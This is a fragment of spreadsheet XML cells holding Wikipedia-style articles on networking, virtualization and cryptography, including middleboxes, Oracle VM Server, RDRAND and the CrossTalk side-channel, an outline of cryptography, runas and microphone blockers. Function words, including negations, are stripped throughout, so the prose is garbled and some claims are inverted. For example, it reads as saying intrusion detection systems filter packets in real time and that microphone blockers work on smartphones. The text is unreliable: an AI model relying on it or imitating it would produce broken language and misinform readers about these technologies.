order address records time name server queried. because take transaction time, server load, network congestion consideration, works best services large number uniformly distributed connections servers equivalent capacity. otherwise, load distribution.methods exist overcome limitations. example, modified servers (such lbnamed) routinely poll mirrored servers availability load factor. server reply required, server temporarily removed pool, reports operating within specs. references</t>
  </si>
  <si>
    <t>Middlebox</t>
  </si>
  <si>
    <t>middlebox computer networking device transforms, inspects, filters, manipulates traffic purposes packet forwarding. these extraneous functions interfered application performance criticized violating "important architectural principles" end-to-end principle. examples middleboxes include firewalls, network address translators (nats), load balancers, deep packet inspection (dpi) boxes.ucla computer science professor lixia zhang coined term middlebox 1999. usage middleboxes widely deployed across private public networks. dedicated middlebox hardware widely deployed enterprise networks improve network security performance, however, even home network routers often integrated firewall, nat, middlebox functionality. 2017 study counting 1,000 deployments autonomous systems, directions traffic flows, across wide range networks, including mobile operators data center networks. examples following examples commonly deployed middleboxes: firewalls filter traffic based predefined security rules defined network administrator. firewalls reject packets "based purely fields transport headers (e.g., disallow incoming traffic certain port numbers, disallow traffic certain subnets etc.)" other types firewalls complex rulesets, including inspect traffic session application layer. intrusion detection systems (idss) monitor traffic collect data offline analysis security anomalies. unlike firewalls, idss filter packets real time, capable complex inspection must decide whether accept reject packet arrives. network address translators (nats) replace source and/or destination addresses packets traverse them. typically, nats deployed allow multiple hosts share single address: hosts "behind" assigned private address packets destined public internet traverse nat, replaces internal private address shared public address. these widely used cellular network providers manage scarce resources. optimizers improve bandwidth consumption perceived latency endpoints. typically deployed large enterprises, optimizers deployed near sending receiving endpoints communication; devices coordinate cache compress traffic traverses internet. load balancers provide point entry service, forward traffic flows hosts actually provide service. cellular networks middleboxes ensure scarce network resources used efficiently well protect client devices. criticism challenges middleboxes generated technical challenges application development incurred "scorn" "dismay" network architecture community violating end-to-end principle computer system design. application interference some middleboxes interfere application functionality, restricting preventing host applications performing properly. particular, network address translators (nats) present challenge devices divide traffic destined public address across several receivers. when connections host internet host behind initiated host behind nat, learns traffic connection belongs local host. thus, traffic coming internet destined public (shared) address particular port, direct traffic appropriate host. however, connections initiated host internet present opportunity "learn" internal host connection belongs moreover, internal host even know public address announce potential clients address connect resolve issue, several protocols proposed.additionally, middlebox deployments cell operators at&amp;t t-mobile opaque, application developers often "unaware middlebox policies enforced operators" operators lack full knowledge application behavior requirements. example, carrier "aggressive timeout value quickly recycle resources held inactive connections firewall, unexpectedly causing frequent disruptions long-lived occasionally idle connections maintained applications push-based email instant messaging".other common middlebox-induced application challenges include proxies serving "stale" out-of-date content, firewalls rejecting traffic desired ports. internet extensibility design criticism middleboxes limit choice transport protocols, thus limiting application service designs. middleboxes filter drop traffic conform expected behaviors, uncommon protocols protocol extensions filtered out. specifically, middleboxes make hosts private address realms unable "pass handles allowing hosts communicate them" hindered spread newer protocols like session initiation protocol (sip) well various peer-to-peer systems. this progressive reduction flexibility described protocol ossification.conversely, middleboxes assist protocol deployment providing translation protocols. example, ipv6 deployed public endpoints load balancers, proxies, forms nat, backend traffic routed ipv4 ipv6. also end-to-end connectivity interactive connectivity establishment (ice) session traversal utilities (stun) traversal using relay (turn) multilayer switch references</t>
  </si>
  <si>
    <t>Oracle VM Server for x86</t>
  </si>
  <si>
    <t>oracle server server virtualization offering oracle corporation. oracle server incorporates free open-source hypervisor technology, supports windows, linux, solaris guests includes integrated based management console. oracle server features fully tested certified oracle applications stack enterprise virtualization environment.oracle server freely downloaded oracle software delivery cloud. oracle announced general availability oracle 3.4.6 november 2018. components oracle manager: based management console manage oracle servers. oracle server: includes version hypervisor technology, oracle agent communicate oracle manager management virtual machines. also includes minimized linux kernel dom0. versions 3.4.6.3 june 2020export oracle cloud infrastructure (oci) security updates cumulative fixes 3.4.6.2 december 2019additional linux guest support (oracle linux 8.x, enterprise linux 8.x, centos 8.x) security updates cumulative fixes release model 3.4.6.1 june 2019updated versions oracle manager oracle agent sparc security updates cumulative fixes 3.4.6 november 2018updated hypervisor update dom0 kernel security patch updates oracle server packages security patch updates oracle manager components user-defined validity months option self-signed certificates option change location running virtual machine increased virtual configuration limit pvhvm 3.4.5 june 2018support hybrid columnar compression (hcc) better oracle database performance fiber channel storage refresh option oracle generic storage plugin deployments balance server start policy complement best server policy increased performance microsoft windows guest operating systems support tls1.2 default connectivity protocol update dom0 kernel updated hypervisor security patch updates oracle manager components security patch updates oracle server packages 3.4.4 august 2017unbreakable enterprise kernel release (uek server package updates security updates manager components server packages updated hypervisor improved throughput iops performance support microsoft windows server 2016 support skylake processors 3.4.3 2017the ability microsoft windows server failover clustering (wsfc) oracle windows driver 3.4.2 enhanced raid functionality, support software raid devices manager performance supportability enhancements simplified uefi boot process oracle server updated unbreakable enterprise kernel release updates server packages security updates manager components server packages 3.4.2 september 2016includes updated dom0 kernel based mainline kernel oracle unbreakable enterprise kernel (uek) release update adds nvme support, extended scsi support guest numerous performance improvements host guest oracle manager performance scalability improvements, security improvements. extended scsi functionality available virtual machines 3.4.1 april, 2016support oracle virtual appliances automated installation serial console software storage live migration user interface enhancements virtual disk allocation fiber channel ethernet (fcoe) support booting uefi dom0 kernel upgraded increased supported limits improved performance resource limits version 3.4.6, oracle server take advantage cpus (tested) 2048 cpus (designed), server host maximum server. vcpus (pvm) (hvm, pvhvm) server, life march 2021 premier support ended, although extended support available march 2024 https://blogs.oracle.com/virtualization/post/announcing-oracle-vm-3-extended-support also docker kernel-based virtual machine libvirt oracle server sparc references external links official website</t>
  </si>
  <si>
    <t>Midori (operating system)</t>
  </si>
  <si>
    <t>midori (which means green japanese) code name managed code operating system (os) developed microsoft joint effort microsoft research. reported possible commercial implementation singularity, research project begun 2003 build highly dependable kernel, device drivers, application software written managed code. designed concurrency, could program spread across multiple nodes once. also featured security model sandboxes applications increased security. microsoft mapped several possible migration paths windows midori. midori discontinued time 2015, though many concepts used microsoft projects. history code name midori first discovered powerpoint presentation chess: systematic testing tool concurrent software.another reference midori found presentation shown object-oriented programming, systems, languages applications (oopsla) october 2012 conference. references external links times' david worthington migration away windows times' david worthington midori security technologizer report david worthington windows mobile's life cycle microsoft sees windows era, news duffy blogging midori, 2015</t>
  </si>
  <si>
    <t>Migration (virtualization)</t>
  </si>
  <si>
    <t>context virtualization, guest simulation entire computer actually merely software virtual machine (vm) running host computer hypervisor, migration (also known teleportation) process running virtual machine moved physical host another, little disruption service. subjective effects ideally, process completely transparent, resulting disruption service downtime). practice, always minor pause availability, though enough hard real-time systems affected. virtualization frequently used network services user applications, generally tolerate brief delays involved. perceived impact, any, similar longer-than-usual kernel delay. objective effects actual process heavily dependent particular virtualization package use, general, process follows: regular snapshots (its simulated hard disk storage, memory, virtual peripherals) taken background hypervisor, administrative scripts. each snapshot adds differential overlay file stack that, whole, fully describes machine. only topmost overlay written since older overlays read-only, safe copy another machine—the backup host. this done regular intervals, overlay need copied once. when migration operation requested, virtual machine paused, current state saved disk. these new, final overlay files transferred backup host. since current state consists changes made since last backup synchronization, many applications little transfer, happens quickly. hypervisor host resumes guest virtual machine. ideally, administrative scripts resume backup operations, host becomes primary, previous host receives backup copies, readying subsequent migration operation.note practice, regular maintenance operations required "merge down" snapshot stack manageable number files, improve performance optimize storage (redundant overwrites merged out). relation failover migration similar failover capability virtualization suites provide. true failover, host suddenly completely failed, precludes latest state copied backup host. however, backup host everything except latest changes, indeed able resume operation last known coherent state. because operations similar, systems provide capability provide other. references</t>
  </si>
  <si>
    <t>Microsoft Security Development Lifecycle</t>
  </si>
  <si>
    <t>microsoft security development lifecycle software development process used proposed microsoft reduce software maintenance costs increase reliability software concerning software security related bugs. based classical spiral model. versions also trusted computing base further reading external links official website</t>
  </si>
  <si>
    <t>Microsoft SEAL</t>
  </si>
  <si>
    <t>simple encrypted arithmetic library seal free open-source cross platform software library developed microsoft research implements various forms homomorphic encryption. history development originally came cryptonets paper, demonstrating artificial intelligence algorithms could homomorphically encrypted data.it open-source (under license) written standard without external dependencies compiled cross platform. official .net wrapper written available makes easier .net applications interact seal. features algorithms microsoft seal supports asymmetric symmetric (added version 3.4) encryption algorithms. scheme types microsoft seal comes different homomorphic encryption schemes different properties: bfv: scheme allows modular arithmetic performed encrypted integers. applications exact values necessary, scheme choice. ckks: ckks scheme allows additions multiplications encrypted real complex numbers, yields approximate results. applications summing encrypted real numbers, evaluating machine learning models encrypted data, computing distances encrypted locations ckks going best choice. compression data compression achieved building seal zlib support. default, data compressed using deflate algorithm achieves significant memory footprint savings serializing objects encryption parameters, ciphertexts, plaintexts, available keys: public, secret, relin (relinearization), galois. compression always disabled. availability there several known ports seal languages active development: microsoft seal (microsoft's source) c#/f# nuget (microsoft's official package) python pyseal seal-python tf-seal pyfhel javascript node-seal sealjs typescript node-seal references external links microsoft seal: fast easy-to-use homomorphic encryption library seal github</t>
  </si>
  <si>
    <t>RDRAND</t>
  </si>
  <si>
    <t>rdrand (for "read random"; known intel secure technology, previously known bull mountain) instruction returning random numbers intel on-chip hardware random number generator seeded on-chip entropy source. rdrand available bridge processors part intel ia-32 instruction architectures. added support instruction june 2015.the random number generator compliant security cryptographic standards nist 800-90a, fips 140-2, ansi x9.82. intel also requested cryptography research inc. review random number generator 2012, resulted paper analysis intel's bridge digital random number generator.rdseed similar rdrand provides lower-level access entropy-generating hardware. rdseed generator processor instruction rdseed available intel broadwell cpus cpus. overview cpuid instruction used intel cpus check whether rdrand instruction supported. register calling cpuid standard function 01h. processors checked feature using test. rdseed availability checked intel cpus similar manner. rdseed supported, register calling cpuid standard function 07h.the opcode rdrand 0x0f 0xc7, followed modrm byte specifies destination register optionally combined prefix 64-bit mode.intel secure intel's name rdrand instruction underlying random number generator (rng) hardware implementation, codenamed "bull mountain" development. intel calls "digital random number generator" drng. generator takes pairs 256-bit entropy samples generated hardware entropy source applies advanced encryption standard (aes) cbc-mac mode) conditioner reduces single 256-bit conditioned entropy sample. deterministic random-bit generator called drbg defined nist 800-90a seeded output conditioner, providing cryptographically secure random numbers applications requesting rdrand instruction. hardware issue maximum 128-bit samples changing seed value. using rdseed operation provides access conditioned 256-bit samples aes-cbc-mac. rdseed instruction added intel secure seeding another pseudorandom number generator, available broadwell cpus. entropy source rdseed instruction runs asynchronously self-timed circuit uses thermal noise within silicon output random stream bits rate ghz, slower effective gbit/s obtainable rdrand (both rates shared cores threads). rdseed instruction intended seeding software prng arbitrary width, whereas rdrand intended applications merely require high-quality random numbers. cryptographic security required, software prng xorshift usually faster. performance intel core i7-7700k, 4500 mhz) processor (kaby lake-s microarchitecture), single rdrand rdseed instruction takes clock cycles, regardless operand size (16/32/64 bits). this number clock cycles applies processors skylake kaby lake microarchitecture. silvermont microarchitecture processors, instructions take around 1472 clock cycles, regardless operand size; bridge processors rdrand takes clock cycles.on ryzen cpu, instructions takes around 1200 clock cycles 16-bit 32-bit operand, around 2500 clock cycles 64-bit operand.an astrophysical monte carlo simulator examined time generate 64-bit random numbers using rdrand quad-core intel i7-3740 processor. they found implementation rdrand slower default random number generator slower mersenne twister. although python module rdrand constructed, found slower default random number generator python, although performance comparison prng csprng cannot made. microcode update released intel june 2020, designed mitigate crosstalk vulnerability (see security issues section below), negatively impacts performance rdrand rdseed additional security controls. processors mitigations applied, affected instruction incurs additional latency simultaneous execution rdrand rdseed across cores effectively serialised. intel introduced mechanism relax security checks, thus reducing performance impact scenarios, intel processors apply security relaxation default. compilers visual 2015 provides intrinsic wrapper support rdrand rdseed functions. 4.6+ clang 3.2+ provide intrinsic functions rdrand -mrdrnd specified flags, also setting __rdrnd__ allow conditional compilation. newer versions additionally provide immintrin.h wrap built-ins functions compatible version 12.1+ intel's compiler. these functions write random data location pointed parameter, return success. applications option generate cryptographically secure random numbers using rdrand rdseed openssl, help secure communications. scientific application rdrand found astrophysics. radio observations low-mass stars brown dwarfs revealed number emit bursts radio waves. these radio waves caused magnetic reconnection, process causes solar flares sun. rdrand used generate large quantities random numbers monte carlo simulator, model physical properties brown dwarfs effects instruments observe them. they found brown dwarfs sufficiently magnetic emit strong radio bursts. they also evaluated performance rdrand instruction python compared random number generators. reception september 2013, response york times article revealing nsa's effort weaken encryption, theodore ts'o publicly posted concerning rdrand /dev/random linux kernel: glad resisted pressure intel engineers /dev/random rely rdrand instruction. quote [new york times article]: year, sigint enabling project found ways inside encryption chips scramble information businesses governments, either working chipmakers insert back doors..." relying solely hardware random number generator using implementation sealed inside chip impossible audit idea. linus torvalds dismissed concerns rdrand linux kernel pointed used source entropy /dev/random, rather used improve entropy combining values received rdrand sources randomness. however, taylor hornby defuse security demonstrated linux random number generator could become insecure backdoor introduced rdrand instruction specifically targets code using hornby's proof-of-concept implementation works unmodified linux kernel prior version 3.13. issue mitigated linux kernel 2013.developers changed freebsd kernel away using rdrand padlock directly comment "for freebsd going backtrack remove rdrand padlock backends feed yarrow instead delivering output directly /dev/random. still possible access hardware random number generators, rdrand, padlock etc., directly inline assembly using openssl userland, required, cannot trust more." freebsd /dev/random uses fortuna rdrand started freebsd security issues june 2020, researchers vrije universiteit amsterdam published side-channel attack named crosstalk (cve-2020-0543) affected rdrand number intel processors. they discovered outputs hardware digital random number generator (drng) stored staging buffer shared across cores. vulnerability allowed malicious code running affected processor read rdrand rdseed instruction results victim application running another core processor, including applications running inside intel enclaves. researchers developed proof-of-concept exploit extracted complete ecdsa enclave running separate core signature operation. vulnerability affects scenarios untrusted code runs alongside trusted code processor, shared hosting environment. intel refers crosstalk vulnerability special register buffer data sampling (srbds). response research, intel released microcode updates mitigate issue. updated microcode ensures off-core accesses delayed sensitive operations specifically rdrand, rdseed, egetkey instructions completed staging buffer overwritten. srbds attack also affects instructions, read msrs, intel apply additional security protections performance concerns reduced need confidentiality instructions' results. wide range intel processors released 2012 2019 affected, including desktop, mobile, server processors. mitigations resulted negative performance impacts using affected instructions, particularly executed parallel multi-threaded applications, increased latency introduced security checks effective serialisation affected instructions across cores. intel introduced opt-out option, configurable ia32_mcu_opt_ctrl logical processor, improves performance disabling additional security checks instructions executing outside enclave. also instruction bullrun (decryption program) openssl wolfssl notes references external links rdrand .net open source project</t>
  </si>
  <si>
    <t>Microsoft Point-to-Point Encryption</t>
  </si>
  <si>
    <t>microsoft point-to-point encryption (mppe) encrypts data point-to-point protocol (ppp)-based dial-up connections point-to-point tunneling protocol (pptp) virtual private network (vpn) connections. 128-bit (strong), 56-bit key, 40-bit (standard) mppe encryption schemes supported. mppe provides data security pptp connection client server. mppe alone compress expand data, protocol often used conjunction microsoft point-to-point compression compresses data across links. negotiation mppe happens within compression control protocol (ccp), subprotocol ppp. this lead incorrect belief compression protocol. 3078, defines protocol, defines either 40-bit 128-bit lengths encryption options protocol. external links 3078 (the protocol), 3079 (deriving initial session keys) mppe, microsoft point-to-point encryption protocol</t>
  </si>
  <si>
    <t>Outline of cryptography</t>
  </si>
  <si>
    <t>following outline provided overview topical guide cryptography: cryptography cryptology) practice study hiding information. modern cryptography intersects disciplines mathematics, computer science, engineering. applications cryptography include cards, computer passwords, electronic commerce. essence cryptography cryptographer encryption/decryption cryptographic cipher ciphertext plaintext code tabula recta alice uses cryptographic techniques commitment schemes secure multiparty computation electronic voting authentication digital signatures crypto systems dining cryptographers problem anonymous remailer pseudonymity onion routing digital currency secret sharing indistinguishability obfuscation branches cryptography multivariate cryptography post-quantum cryptography quantum cryptography steganography visual cryptography history cryptography japanese cryptology 1500s meiji world cryptography world cryptography reservehandverfahren venona project ultra ciphers classical substitution monoalphabetic substitution caesar cipher rot13 affine cipher atbash cipher keyword cipher polyalphabetic substitution vigenère cipher autokey cipher homophonic substitution cipher polygraphic substitution playfair cipher hill cipher transposition scytale grille permutation cipher cipher complex hand cypher used least soviet early 1950s; proved quite secure time modern symmetric-key algorithms a5/1 a5/2 ciphers specified cellular telephone standard bmgl chameleon fish siemens wwii 'fish' cyphers geheimfernschreiber wwii mechanical onetime siemens called sturgeon bletchley park pike improvement fish ross anderson schlusselzusatz wwii mechanical onetime lorenz, called tunny bletchley park helix isaac intended prng leviathan lili-128 mugi cryptrec recommendation multi-s01 cryptrec recommendation one-time vernam mauborgne, patented 1919; extreme stream cypher panama (arcfour) series professor rivest mit; cryptrec recommended limited 128-bit ciphersaber (rc4 variant byte random easy implement salsa20 estream recommended cipher chacha20 salsa20 variant. seal snow sober sober-t16 sober-t32 wake(7330283203) block ciphers product cipher feistel cipher pattern horst feistel advanced encryption standard (rijndael) 128-bit block; nist selection aes, fips 197; created 2001—by joan daemen vincent rijmen; nessie selection; cryptrec recommendation. anubis 128-bit block bear built stream cypher hash function, ross anderson blowfish 64-bit block; bruce schneier camellia 128-bit block; nessie selection (ntt mitsubishi electric); cryptrec recommendation cast-128 (cast5) 64-bit block; series algorithms carlisle adams stafford tavares, insistent name initials cast-256 (cast6) 128-bit block; successor cast-128 candidate competition cipherunicorn-a 128-bit block; cryptrec recommendation cipherunicorn-e 64-bit block; cryptrec recommendation (limited) cmea cipher used cellphones, found weaknesses. cs-cipher 64-bit block data encryption standard (des) 64-bit block; fips 46-3, 1976 deal candidate derived des-x variant increase size. feal gdes variant designed speed encryption grand 128-bit block hierocrypt-3 128-bit block; cryptrec recommendation hierocrypt-l1 64-bit block; cryptrec recommendation (limited) idea project name fox, 64-bit 128-bit block family; mediacrypt (switzerland); pascal junod serge vaudenay swiss institute technology lausanne international data encryption algorithm (idea) 64-bit block;james massey zurich iraqi block cipher (ibc) kasumi 64-bit block; based misty1, adopted next generation w-cdma cellular phone security khazad 64-bit block designed barretto rijmen khufu khafre 64-bit block ciphers kuznyechik russian 128-bit block cipher, defined gost 34.12-2015 7801. lion block cypher built stream cypher hash function, ross anderson loki89/91 64-bit block ciphers loki97 128-bit block cipher, candidate lucifer tuchman ibm, early 1970s; modified nsa/nbs released magenta candidate mars finalist, coppersmith misty1 nessie selection 64-bit block; mitsubishi electric (japan); cryptrec recommendation (limited) misty2 128-bit block: mitsubishi electric (japan) nimbus 64-bit block noekeon 128-bit block nush variable block length (64-256-bit) 128-bit block 64-bit block, variable length variable block length; finalist, rivest rivest safer variable block length sc2000 128-bit block; cryptrec recommendation serpent 128-bit block; finalist ross anderson, biham, lars knudsen shacal-1 160-bit block shacal-2 256-bit block cypher; nessie selection gemplus (france) shark grandfather rijndael/aes, daemen rijmen square father rijndael/aes, daemen rijmen david wheeler roger needham triple walter tuchman, leader lucifer design team—not triple uses increase security, tuchman's does; cryptrec recommendation (limited), used fips 46-3 twofish 128-bit block; finalist bruce schneier xtea david wheeler roger needham 3-way 96-bit block joan daemen polyalphabetic substitution machine cyphers enigma wwii german rotor cypher machine—many variants, user networks variants purple highest security wwii japanese foreign office cypher machine; japanese navy captain sigaba wwii cypher machine william friedman, frank rowlett typex wwii cypher machine hybrid code/cypher combinations jn-25 wwii japanese navy superencyphered code; many variants naval cypher superencrypted code used royal navy 1930s wwii modern asymmetric-key algorithms asymmetric algorithm ace-kem nessie selection asymmetric encryption scheme; zurich research encrypt chor-rivest diffie-hellman agreement; cryptrec recommendation gamal discrete logarithm elliptic curve cryptography (discrete logarithm variant) psec-kem nessie selection asymmetric encryption scheme; (japan); cryptrec recommendation construction w/sec1 parameters ecies elliptic curve integrated encryption system, certicom corporation ecies-kem ecdh elliptic curve diffie-hellman agreement, cryptrec recommendation epoc merkle–hellman knapsack cryptosystem knapsack scheme mceliece cryptosystem niederreiter cryptosystem ntruencrypt factoring rsa-kem nessie selection asymmetric encryption scheme; iso/iec 18033-2 draft rsa-oaep cryptrec recommendation rabin cryptosystem factoring rabin-saep hime(r) threshold cryptosystem keys authentication public infrastructure x.509 openpgp public certificate certificate authority certificate revocation list id-based cryptography certificate-based encryption secure issuing cryptography certificateless cryptography merkle tree transport/exchange diffie–hellman man-in-the-middle attack needham–schroeder offline private otway–rees trusted paper wide mouth frog weak keys brute force attack dictionary attack related attack derivation function strengthening password password-authenticated agreement passphrase salt factorization cryptographic hash functions message authentication code keyed-hash message authentication code encrypted cbc-mac (emac) nessie selection hmac nessie selection mac; iso/iec 9797-1, fips ietf ttmac (two-track-mac) nessie selection mac; k.u.leuven (belgium) debis (germany) umac nessie selection mac; intel, unevada reno, ibm, technion, davis series message digest algorithms prof rivest mit; 128-bit digest sha-1 developed 160-bit digest, fips standard; first released version defective replaced this; nist/nsa released several variants longer 'digest' lengths; cryptrec recommendation (limited) sha-256 nessie selection hash function, fips 180-2, 256-bit digest; cryptrec recommendation sha-384 nessie selection hash function, fips 180-2, 384-bit digest; cryptrec recommendation sha-512 nessie selection hash function, fips 180-2, 512-bit digest; cryptrec recommendation sha-3 originally known keccak; winner nist hash function competition using sponge function. streebog russian algorithm created replace obsolete gost hash function defined obsolete standard gost 34.11-94. ripemd-160 developed europe ripe project, 160-bit digest; cryptrec recommendation (limited) rtr0 retter series; developed maciej czyzewski; 160-bit digest tiger ross anderson snefru nist hash function competition whirlpool nessie selection hash function, scopus tecnologia s.a. (brazil) k.u.leuven (belgium) cryptanalysis classical frequency analysis contact analysis index coincidence kasiski examination modern symmetric algorithms boomerang attack brute force attack davies' attack; differential cryptanalysis impossible differential cryptanalysis integral cryptanalysis linear cryptanalysis meet-in-the-middle attack mod-n cryptanalysis related-key attack slide attack attack hash functions: birthday attack attack models chosen-ciphertext chosen-plaintext ciphertext-only known-plaintext side channel attacks power analysis timing attack cold boot attack network attacks man-in-the-middle attack replay attack external attacks black-bag cryptanalysis rubber-hose cryptanalysis robustness properties provable security random oracle model ciphertext indistinguishability semantic security malleability forward secrecy forward anonymity freshness undeciphered historical codes ciphers beale ciphers chaocipher d'agapeyeff cipher dorabella cipher rongorongo shugborough inscription voynich manuscript organizations selection projects cryptography standards federal information processing standards (fips) publication program nist produce standards many areas guide operations federal government; many fips publications ongoing related cryptography american national standards institute (ansi) standardization process produces many standards many areas; cryptography related, ongoing) international organization standardization (iso) standardization process produces many standards many areas; cryptography related, ongoing institute electrical electronics engineers (ieee) standardization process produces many standards many areas; cryptography related, ongoing internet engineering task force (ietf) standardization process produces many standards called rfcs) many areas; cryptography related, ongoing) general cryptographic national security agency (nsa) internal evaluation/selections, charged assisting nist cryptographic responsibilities government communications headquarters (gchq) internal evaluation/selections, division charged developing recommending cryptographic standards government defence signals directorate (dsd) australian sigint agency, part echelon communications security establishment (cse) canadian intelligence agency open efforts data encryption standard (des) selection process, ended 1976 ripe division race project sponsored european union, ended mid-1980s advanced encryption standard (aes) "break-off" competition sponsored nist, ended 2001 nessie project evaluation/selection program sponsored european union, ended 2002 estream– program funded ecrypt; motivated failure stream ciphers submitted nessie, ended 2008 cryptrec evaluation/recommendation program sponsored japanese government; draft recommendations published 2003 cryptool e-learning freeware programme english german— exhaustive educational tool cryptography cryptanalysis influential cryptographers list cryptographers legal issues aacs encryption controversy free speech bernstein united states daniel bernstein's challenge restrictions export cryptography united states. junger daley decss phil zimmermann arms export control investigation regarding software. export cryptography escrow clipper chip digital millennium copyright digital rights management (drm) patents public domain david chaum digital cash cryptography enforcement telephone wiretapping espionage cryptography laws different nations official secrets united kingdom, india, ireland, malaysia, formerly zealand regulation investigatory powers 2000 united kingdom academic professional publications journal cryptology encyclopedia cryptography security cryptologia quarterly journal focusing historical aspects communication theory secrecy systems cryptography viewpoint information theory allied sciences security engineering also outline computer science outline computer security references</t>
  </si>
  <si>
    <t>Runas</t>
  </si>
  <si>
    <t>computing, runas command microsoft windows line operating systems allows user specific tools programs different username used logon computer interactively. similar unix commands sudo unix commands generally require prior configuration system administrator work particular user and/or command. microsoft windows runas command introduced windows 2000 operating system. application create process alternate credentials, example, windows explorer windows allows application started different account shift held right-clicking icon. program ability cache verified credentials user ever enter once. syntax command-syntax parameters this section paraphrased runas command. /noprofile: speeds loading application skipping loading user's profile. note might speed every application. /profile: skip loading user's profile. this default setting. /env: actual environment, user's. /netonly: specifies given credentials used remote access only. /savecred: credentials saved previous user. this setting available windows home windows starter edition. this setting left windows home edition well. /smartcard: specifies credentials supplied smartcard. /user: format either user@domain domain\user. /showtrustlevels: shows help (list usable trust level parameters) /trustlevel switch. /trustlevel: trust levels listed /showtrustlevels switch. program: command line executable file. examples below.note: only type user's password, system asks note: /profile switch compatible /netonly switch. note: /savecred /smartcard switches used together. examples inferno command also included inferno operating system. syntax runas writes user /dev/user invokes given arguments. note: command invoked setting user name succeeds. also comparison privilege authorization features sudo doas principle least privilege user account control, disables administrator desktop, allowing re-enabled exception. references further reading frisch, æleen (2001). windows 2000 commands pocket reference. o'reilly. isbn 978-0-596-00148-3. stanek, william (2008). windows command-line administrator's pocket consultant, edition. microsoft press. isbn 978-0735622623. external links sysinternals shellrunas alternative runas tools runas(1) inferno general commands manual</t>
  </si>
  <si>
    <t>Microphone blocker</t>
  </si>
  <si>
    <t>microphone blocker phone microphone connector used trick feature phones physical microphone switch disconnect microphone. microphone blockers operate smartphones laptops microphone controlled software rather physical switch. safety test hardware devices always tested controlled software renders microphone blocker useless. this simply done plugging headset microphone jack activate internal microphone speaker mode smartphones feature phones speak near phone keeping microphone distance plugged), program always internal microphone hardware devices like laptops. working alternatives modern hardware devices hardware kill switch (hks): some hardware devices physically disconnect and/or power integrated components security switches. hacking consumer electronics: whistleblower edward snowden showed wired correspondent shane smith remove cameras microphones smartphone. practical ways physically removing internal microphones (there one, like noise cancellation mic) plug headsets using headset microphone record needed. modular hardware: cameras microphones physically removed modular hardware. smartphone incompatibility microphone blockers, including commercial microphone blockers integrated circuit marketed provide "extra security", useful smartphones controlled entirely software. demonstrated connecting microphone blocker smartphone, make phone call speaker mode also active internal microphone. however, although would work, problems: since apple started exclude headphone jack 2016 iphone iphone plus later versions, phone companies eliminating trrs male microphone blocker adapters connectors lightning cables exist, cables usb-c connectors produced. apple filed dozens wireless patents, rumors planning produce products without lightning ports future make completely wireless. bluetooth vendors advise customers vulnerable bluetooth devices either turn areas regarded unsafe undiscoverable. portable bluetooth adapters wired headsets, used workaround connect microphone blocker wireless hardware devices bluetooth connectivity, however making susceptible bluesnarfing. some hardware devices google nexus smartphones) addition internal recording microphone internal noise cancellation microphone time, independent plugged audio jack connector. feature phone compatibility phone connector without microphone channel cannot used microphone blocker deactivate external microphone. three- four-conductor (trs trrs) sockets common older cell phones newer smartphones respectively, providing mono (three conductor) stereo (four conductor) sound microphone input, together signaling (e.g., push button answer call). older hardware devices ctia/ahj facto trrs standard. omtp mostly used older hardware devices. however, mobile phones jack connectors socket cannot used modern microphone blockers typically mobile phones notorious security hardware itself. ctia headset connected mobile phone omtp interface, external microphone stay active. there, internal microphone active holding microphone headset. standard tcia/ahj trrs microphone blocker cannot used omtp socket hardware devices recommended test microphone blockers make sure really work. operation microphone blockers disable internal microphone tricking device believing external microphone connected. microphone blocker channel enough disconnect internal microphone, commercial microphone blockers trrs connections theory makes headset blockers smartphones also disconnect internal speaker media player software connect headphones, ringtones, alarms, functioning normal internal speaker external speaker(s). successful operation microphone blocker depends internal scheme mobile device, fully block microphone without possibility recovering data, disregard signal internal microphone possibility recording needed. issues some devices allow internal external microphone works simultaneously recognize external microphone connected. types microphone blocking plug microphone blocking plug phone connector microphone channel cannot used plugged end. some products shipped female connectors (with keychain hole, small strap attached directly smartphone cases) prevent loss male connector detached. mobile phone charm (especially connector instead rubber plug) used conceal dummy blocker. microphone blocking plug used debug software-defined radio demands connector plugged cannot used stream radio antenna efficiency. life hack common products used microphone blockers: soldering jack plug (tr, trs, trrs), metal plastic base slim plug right angle recommended jack plug hole smartphone cases cause frictions socket. trrs male-male jack plug cable another cheap solution provides microphone blocking plugs, cost plug usually cheaper commercial microphone blocking plugs. cable either provide separate plugs left intact allow plugging mobile phones. headphone cable microphone, wired headset, wired microphone more expensive provide blocking plug.it's possible microphone connectors without microphone circuit like solutions offer security, plug connector microphone microphone circuit, software ability override default behavior. microphone blocking adapter headset integrated microphone blocker also exist, allowing users headphones (ie. listening music) without risking eavesdropped. microphone blocking adapters phone connectors adapters microphone channel mechanism produces false positive signal simulating connected microphone. this mechanism cannot built pairing multiple connectors: headset connected trrs headset extension cable adapter connected headphone cable adapter trick connected mobile phone disconnect external microphone. applications this section describes microphone blocking plugs adapters. eavesdropping protection feature phones microphone blocker cheap, simple accessory provides countersurveillance eavesdropping, example recording eavesdropping interception (like cellphone surveillance), phone hacking, work smartphones controlled software. however, variety computing vulnerabilities like proprietary software firmware, backdoors, hardware security bugs, hardware backdoors, hardware trojans, spyware, malware programs turn mobile device's microphone remotely, vast majority devices internal hardware protection prevent eavesdropping. most antivirus software, anti-spying software guarantee microphone fully blocked disabled even prevented spyware malware constantly changing improving. leaked documents published wikileaks, codenamed vault dated 2013 2016, described capabilities united states central intelligence agency (cia) perform electronic surveillance cyber warfare, including ability compromise operating systems smartphones, turning permanent listening devices. millions smartphones could also vulnerable software cracking accelerometers.a acoustic cryptanalysis technique discovered research team israel's ben-gurion university cybersecurity research center allows data extracted using computer's speakers headphones. forbes published report stating researchers found information displayed, using microphone, 96.5% accuracy. pocket dialing protection microphone blocker useful prevent mobile phone audio interception pocket dialing. abuse social engineering person wiretap conversations persons social engineering deceived microphone blockers safe smartphones. this theory exploited companies manufacture sell commercial microphone blockers require mobile phone number people order products support. marketing ethic issue manufacturers commercial microphone blockers phone jacks intended smartphones, sometimes claim blocker inbuilt semiconductor integrated circuit (sometimes patented form marketing purpose) offer superior security give security all, deceive people make money them. this raised questions marketing ethics. also crypto phone faraday cage mobile phone jammer mobile phone accessory mobile security secure voice references external links keep snoops listening laptop's microphone keep hackers listening computer plug "hacking windows remotely record listen microphone hacked computer". wonderhowto. retrieved 2019-03-13.</t>
  </si>
  <si>
    <t>Rudder (software)</t>
  </si>
  <si>
